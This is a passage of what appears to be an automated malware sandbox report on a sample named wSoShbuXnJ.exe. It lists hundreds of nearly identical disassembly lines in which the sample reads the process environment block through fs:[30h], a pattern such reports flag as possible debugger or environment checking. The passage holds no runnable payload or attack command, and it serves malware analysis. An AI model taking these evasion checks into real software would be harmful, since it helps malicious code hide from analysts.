                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E03E9 mov eax, dword ptr fs:[00000030h]8_2_014E03E9
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E03E9 mov eax, dword ptr fs:[00000030h]8_2_014E03E9
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E03E9 mov eax, dword ptr fs:[00000030h]8_2_014E03E9
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E03E9 mov eax, dword ptr fs:[00000030h]8_2_014E03E9
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015063FF mov eax, dword ptr fs:[00000030h]8_2_015063FF
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014EE3F0 mov eax, dword ptr fs:[00000030h]8_2_014EE3F0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014EE3F0 mov eax, dword ptr fs:[00000030h]8_2_014EE3F0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014EE3F0 mov eax, dword ptr fs:[00000030h]8_2_014EE3F0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F438F mov eax, dword ptr fs:[00000030h]8_2_014F438F
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F438F mov eax, dword ptr fs:[00000030h]8_2_014F438F
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CE388 mov eax, dword ptr fs:[00000030h]8_2_014CE388
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CE388 mov eax, dword ptr fs:[00000030h]8_2_014CE388
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CE388 mov eax, dword ptr fs:[00000030h]8_2_014CE388
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014C8397 mov eax, dword ptr fs:[00000030h]8_2_014C8397
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014C8397 mov eax, dword ptr fs:[00000030h]8_2_014C8397
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014C8397 mov eax, dword ptr fs:[00000030h]8_2_014C8397
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A625D mov eax, dword ptr fs:[00000030h]8_2_015A625D
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0158A250 mov eax, dword ptr fs:[00000030h]8_2_0158A250
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0158A250 mov eax, dword ptr fs:[00000030h]8_2_0158A250
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D6259 mov eax, dword ptr fs:[00000030h]8_2_014D6259
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01558243 mov eax, dword ptr fs:[00000030h]8_2_01558243
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01558243 mov ecx, dword ptr fs:[00000030h]8_2_01558243
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CA250 mov eax, dword ptr fs:[00000030h]8_2_014CA250
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014C826B mov eax, dword ptr fs:[00000030h]8_2_014C826B
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01580274 mov eax, dword ptr fs:[00000030h]8_2_01580274
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01580274 mov eax, dword ptr fs:[00000030h]8_2_01580274
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01580274 mov eax, dword ptr fs:[00000030h]8_2_01580274
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01580274 mov eax, dword ptr fs:[00000030h]8_2_01580274
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01580274 mov eax, dword ptr fs:[00000030h]8_2_01580274
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01580274 mov eax, dword ptr fs:[00000030h]8_2_01580274
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01580274 mov eax, dword ptr fs:[00000030h]8_2_01580274
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01580274 mov eax, dword ptr fs:[00000030h]8_2_01580274
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01580274 mov eax, dword ptr fs:[00000030h]8_2_01580274
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01580274 mov eax, dword ptr fs:[00000030h]8_2_01580274
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01580274 mov eax, dword ptr fs:[00000030h]8_2_01580274
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01580274 mov eax, dword ptr fs:[00000030h]8_2_01580274
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D4260 mov eax, dword ptr fs:[00000030h]8_2_014D4260
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D4260 mov eax, dword ptr fs:[00000030h]8_2_014D4260
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D4260 mov eax, dword ptr fs:[00000030h]8_2_014D4260
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014C823B mov eax, dword ptr fs:[00000030h]8_2_014C823B
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A62D6 mov eax, dword ptr fs:[00000030h]8_2_015A62D6
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DA2C3 mov eax, dword ptr fs:[00000030h]8_2_014DA2C3
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DA2C3 mov eax, dword ptr fs:[00000030h]8_2_014DA2C3
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DA2C3 mov eax, dword ptr fs:[00000030h]8_2_014DA2C3
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DA2C3 mov eax, dword ptr fs:[00000030h]8_2_014DA2C3
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DA2C3 mov eax, dword ptr fs:[00000030h]8_2_014DA2C3
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E02E1 mov eax, dword ptr fs:[00000030h]8_2_014E02E1
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E02E1 mov eax, dword ptr fs:[00000030h]8_2_014E02E1
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E02E1 mov eax, dword ptr fs:[00000030h]8_2_014E02E1
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150E284 mov eax, dword ptr fs:[00000030h]8_2_0150E284
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150E284 mov eax, dword ptr fs:[00000030h]8_2_0150E284
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01550283 mov eax, dword ptr fs:[00000030h]8_2_01550283
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01550283 mov eax, dword ptr fs:[00000030h]8_2_01550283
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01550283 mov eax, dword ptr fs:[00000030h]8_2_01550283
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E02A0 mov eax, dword ptr fs:[00000030h]8_2_014E02A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E02A0 mov eax, dword ptr fs:[00000030h]8_2_014E02A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015662A0 mov eax, dword ptr fs:[00000030h]8_2_015662A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015662A0 mov ecx, dword ptr fs:[00000030h]8_2_015662A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015662A0 mov eax, dword ptr fs:[00000030h]8_2_015662A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015662A0 mov eax, dword ptr fs:[00000030h]8_2_015662A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015662A0 mov eax, dword ptr fs:[00000030h]8_2_015662A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015662A0 mov eax, dword ptr fs:[00000030h]8_2_015662A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D8550 mov eax, dword ptr fs:[00000030h]8_2_014D8550
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D8550 mov eax, dword ptr fs:[00000030h]8_2_014D8550
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150656A mov eax, dword ptr fs:[00000030h]8_2_0150656A
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150656A mov eax, dword ptr fs:[00000030h]8_2_0150656A
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150656A mov eax, dword ptr fs:[00000030h]8_2_0150656A
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01566500 mov eax, dword ptr fs:[00000030h]8_2_01566500
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A4500 mov eax, dword ptr fs:[00000030h]8_2_015A4500
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A4500 mov eax, dword ptr fs:[00000030h]8_2_015A4500
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A4500 mov eax, dword ptr fs:[00000030h]8_2_015A4500
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A4500 mov eax, dword ptr fs:[00000030h]8_2_015A4500
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A4500 mov eax, dword ptr fs:[00000030h]8_2_015A4500
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A4500 mov eax, dword ptr fs:[00000030h]8_2_015A4500
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015A4500 mov eax, dword ptr fs:[00000030h]8_2_015A4500
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FE53E mov eax, dword ptr fs:[00000030h]8_2_014FE53E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FE53E mov eax, dword ptr fs:[00000030h]8_2_014FE53E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FE53E mov eax, dword ptr fs:[00000030h]8_2_014FE53E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FE53E mov eax, dword ptr fs:[00000030h]8_2_014FE53E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FE53E mov eax, dword ptr fs:[00000030h]8_2_014FE53E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0535 mov eax, dword ptr fs:[00000030h]8_2_014E0535
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0535 mov eax, dword ptr fs:[00000030h]8_2_014E0535
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0535 mov eax, dword ptr fs:[00000030h]8_2_014E0535
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0535 mov eax, dword ptr fs:[00000030h]8_2_014E0535
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0535 mov eax, dword ptr fs:[00000030h]8_2_014E0535
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0535 mov eax, dword ptr fs:[00000030h]8_2_014E0535
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150A5D0 mov eax, dword ptr fs:[00000030h]8_2_0150A5D0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150A5D0 mov eax, dword ptr fs:[00000030h]8_2_0150A5D0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D65D0 mov eax, dword ptr fs:[00000030h]8_2_014D65D0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150E5CF mov eax, dword ptr fs:[00000030h]8_2_0150E5CF
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150E5CF mov eax, dword ptr fs:[00000030h]8_2_0150E5CF
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FE5E7 mov eax, dword ptr fs:[00000030h]8_2_014FE5E7
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FE5E7 mov eax, dword ptr fs:[00000030h]8_2_014FE5E7
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FE5E7 mov eax, dword ptr fs:[00000030h]8_2_014FE5E7
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FE5E7 mov eax, dword ptr fs:[00000030h]8_2_014FE5E7
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FE5E7 mov eax, dword ptr fs:[00000030h]8_2_014FE5E7
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FE5E7 mov eax, dword ptr fs:[00000030h]8_2_014FE5E7
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FE5E7 mov eax, dword ptr fs:[00000030h]8_2_014FE5E7
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FE5E7 mov eax, dword ptr fs:[00000030h]8_2_014FE5E7
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D25E0 mov eax, dword ptr fs:[00000030h]8_2_014D25E0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150C5ED mov eax, dword ptr fs:[00000030h]8_2_0150C5ED
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150C5ED mov eax, dword ptr fs:[00000030h]8_2_0150C5ED
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150E59C mov eax, dword ptr fs:[00000030h]8_2_0150E59C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D2582 mov eax, dword ptr fs:[00000030h]8_2_014D2582
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D2582 mov ecx, dword ptr fs:[00000030h]8_2_014D2582
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01504588 mov eax, dword ptr fs:[00000030h]8_2_01504588
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015505A7 mov eax, dword ptr fs:[00000030h]8_2_015505A7
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015505A7 mov eax, dword ptr fs:[00000030h]8_2_015505A7
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015505A7 mov eax, dword ptr fs:[00000030h]8_2_015505A7
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F45B1 mov eax, dword ptr fs:[00000030h]8_2_014F45B1
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F45B1 mov eax, dword ptr fs:[00000030h]8_2_014F45B1
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0158A456 mov eax, dword ptr fs:[00000030h]8_2_0158A456
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014C645D mov eax, dword ptr fs:[00000030h]8_2_014C645D
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150E443 mov eax, dword ptr fs:[00000030h]8_2_0150E443
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150E443 mov eax, dword ptr fs:[00000030h]8_2_0150E443
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150E443 mov eax, dword ptr fs:[00000030h]8_2_0150E443
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150E443 mov eax, dword ptr fs:[00000030h]8_2_0150E443
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150E443 mov eax, dword ptr fs:[00000030h]8_2_0150E443
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150E443 mov eax, dword ptr fs:[00000030h]8_2_0150E443
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150E443 mov eax, dword ptr fs:[00000030h]8_2_0150E443
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150E443 mov eax, dword ptr fs:[00000030h]8_2_0150E443
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F245A mov eax, dword ptr fs:[00000030h]8_2_014F245A
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155C460 mov ecx, dword ptr fs:[00000030h]8_2_0155C460
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FA470 mov eax, dword ptr fs:[00000030h]8_2_014FA470
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FA470 mov eax, dword ptr fs:[00000030h]8_2_014FA470
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014FA470 mov eax, dword ptr fs:[00000030h]8_2_014FA470
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01508402 mov eax, dword ptr fs:[00000030h]8_2_01508402
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01508402 mov eax, dword ptr fs:[00000030h]8_2_01508402
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01508402 mov eax, dword ptr fs:[00000030h]8_2_01508402
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150A430 mov eax, dword ptr fs:[00000030h]8_2_0150A430
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CC427 mov eax, dword ptr fs:[00000030h]8_2_014CC427
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CE420 mov eax, dword ptr fs:[00000030h]8_2_014CE420
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CE420 mov eax, dword ptr fs:[00000030h]8_2_014CE420
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014CE420 mov eax, dword ptr fs:[00000030h]8_2_014CE420
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01556420 mov eax, dword ptr fs:[00000030h]8_2_01556420
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01556420 mov eax, dword ptr fs:[00000030h]8_2_01556420
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01556420 mov eax, dword ptr fs:[00000030h]8_2_01556420
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01556420 mov eax, dword ptr fs:[00000030h]8_2_01556420
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01556420 mov eax, dword ptr fs:[00000030h]8_2_01556420
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01556420 mov eax, dword ptr fs:[00000030h]8_2_01556420
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01556420 mov eax, dword ptr fs:[00000030h]8_2_01556420
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D04E5 mov ecx, dword ptr fs:[00000030h]8_2_014D04E5
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0158A49A mov eax, dword ptr fs:[00000030h]8_2_0158A49A
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015044B0 mov ecx, dword ptr fs:[00000030h]8_2_015044B0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155A4B0 mov eax, dword ptr fs:[00000030h]8_2_0155A4B0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D64AB mov eax, dword ptr fs:[00000030h]8_2_014D64AB
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01554755 mov eax, dword ptr fs:[00000030h]8_2_01554755
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512750 mov eax, dword ptr fs:[00000030h]8_2_01512750
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512750 mov eax, dword ptr fs:[00000030h]8_2_01512750
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155E75D mov eax, dword ptr fs:[00000030h]8_2_0155E75D
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150674D mov esi, dword ptr fs:[00000030h]8_2_0150674D
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150674D mov eax, dword ptr fs:[00000030h]8_2_0150674D
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150674D mov eax, dword ptr fs:[00000030h]8_2_0150674D
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D0750 mov eax, dword ptr fs:[00000030h]8_2_014D0750
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D8770 mov eax, dword ptr fs:[00000030h]8_2_014D8770
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0770 mov eax, dword ptr fs:[00000030h]8_2_014E0770
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0770 mov eax, dword ptr fs:[00000030h]8_2_014E0770
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0770 mov eax, dword ptr fs:[00000030h]8_2_014E0770
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0770 mov eax, dword ptr fs:[00000030h]8_2_014E0770
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0770 mov eax, dword ptr fs:[00000030h]8_2_014E0770
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0770 mov eax, dword ptr fs:[00000030h]8_2_014E0770
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0770 mov eax, dword ptr fs:[00000030h]8_2_014E0770
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0770 mov eax, dword ptr fs:[00000030h]8_2_014E0770
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0770 mov eax, dword ptr fs:[00000030h]8_2_014E0770
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0770 mov eax, dword ptr fs:[00000030h]8_2_014E0770
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0770 mov eax, dword ptr fs:[00000030h]8_2_014E0770
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0770 mov eax, dword ptr fs:[00000030h]8_2_014E0770
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01500710 mov eax, dword ptr fs:[00000030h]8_2_01500710
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150C700 mov eax, dword ptr fs:[00000030h]8_2_0150C700
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D0710 mov eax, dword ptr fs:[00000030h]8_2_014D0710
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0154C730 mov eax, dword ptr fs:[00000030h]8_2_0154C730
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150273C mov eax, dword ptr fs:[00000030h]8_2_0150273C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150273C mov ecx, dword ptr fs:[00000030h]8_2_0150273C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150273C mov eax, dword ptr fs:[00000030h]8_2_0150273C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150C720 mov eax, dword ptr fs:[00000030h]8_2_0150C720
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150C720 mov eax, dword ptr fs:[00000030h]8_2_0150C720
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DC7C0 mov eax, dword ptr fs:[00000030h]8_2_014DC7C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015507C3 mov eax, dword ptr fs:[00000030h]8_2_015507C3
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F27ED mov eax, dword ptr fs:[00000030h]8_2_014F27ED
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F27ED mov eax, dword ptr fs:[00000030h]8_2_014F27ED
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F27ED mov eax, dword ptr fs:[00000030h]8_2_014F27ED
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155E7E1 mov eax, dword ptr fs:[00000030h]8_2_0155E7E1
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D47FB mov eax, dword ptr fs:[00000030h]8_2_014D47FB
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D47FB mov eax, dword ptr fs:[00000030h]8_2_014D47FB
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157678E mov eax, dword ptr fs:[00000030h]8_2_0157678E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D07AF mov eax, dword ptr fs:[00000030h]8_2_014D07AF
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015847A0 mov eax, dword ptr fs:[00000030h]8_2_015847A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014EC640 mov eax, dword ptr fs:[00000030h]8_2_014EC640
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01502674 mov eax, dword ptr fs:[00000030h]8_2_01502674
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150A660 mov eax, dword ptr fs:[00000030h]8_2_0150A660
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150A660 mov eax, dword ptr fs:[00000030h]8_2_0150A660
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0159866E mov eax, dword ptr fs:[00000030h]8_2_0159866E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0159866E mov eax, dword ptr fs:[00000030h]8_2_0159866E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E260B mov eax, dword ptr fs:[00000030h]8_2_014E260B
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E260B mov eax, dword ptr fs:[00000030h]8_2_014E260B
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E260B mov eax, dword ptr fs:[00000030h]8_2_014E260B
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E260B mov eax, dword ptr fs:[00000030h]8_2_014E260B
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E260B mov eax, dword ptr fs:[00000030h]8_2_014E260B
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E260B mov eax, dword ptr fs:[00000030h]8_2_014E260B
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E260B mov eax, dword ptr fs:[00000030h]8_2_014E260B
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512619 mov eax, dword ptr fs:[00000030h]8_2_01512619
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0154E609 mov eax, dword ptr fs:[00000030h]8_2_0154E609
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D262C mov eax, dword ptr fs:[00000030h]8_2_014D262C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014EE627 mov eax, dword ptr fs:[00000030h]8_2_014EE627
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01506620 mov eax, dword ptr fs:[00000030h]8_2_01506620
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01508620 mov eax, dword ptr fs:[00000030h]8_2_01508620
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150A6C7 mov ebx, dword ptr fs:[00000030h]8_2_0150A6C7
